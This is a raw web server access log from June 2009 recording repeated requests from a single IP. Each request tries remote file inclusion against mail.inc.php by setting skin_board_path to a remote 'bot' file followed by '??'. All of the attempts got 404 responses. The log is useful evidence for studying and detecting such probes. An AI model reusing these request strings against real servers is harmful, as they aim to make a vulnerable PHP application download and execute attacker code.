211.43.212.9 - - [22/Jun/2009:07:00:56 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:00:56 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:00:56 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:00:56 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:00:56 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:00 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:00 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:00 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:02 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
